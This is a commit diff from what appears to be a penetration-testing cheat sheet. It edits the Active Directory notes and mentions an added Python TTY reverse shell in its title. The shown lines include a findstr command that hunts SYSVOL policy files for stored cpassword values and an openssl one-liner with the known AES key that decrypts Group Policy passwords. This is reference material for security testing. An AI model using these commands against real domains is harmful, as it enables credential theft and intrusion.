WebCache param miner file + Reverse shell Python TTY

This commit is contained in:
Swissky
2018-10-08 13:49:50 +02:00
parent 869b29195b
commit 35d4139373
4 changed files with 1109 additions and 3 deletions

View File

@@ -105,7 +105,7 @@ Find password in SYSVOL
findstr /S /I cpassword \\<FQDN>\sysvol\<FQDN>\policies\*.xml
```
Decrypt a password found in SYSVOL (by [0x00C651E0](https://twitter.com/0x00C651E0/status/956362334682849280))
Decrypt a Group Policy Password found in SYSVOL (by [0x00C651E0](https://twitter.com/0x00C651E0/status/956362334682849280))
```bash
echo 'password_in_base64' | base64 -d | openssl enc -d -aes-256-cbc -K 4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b -iv 0000000000000000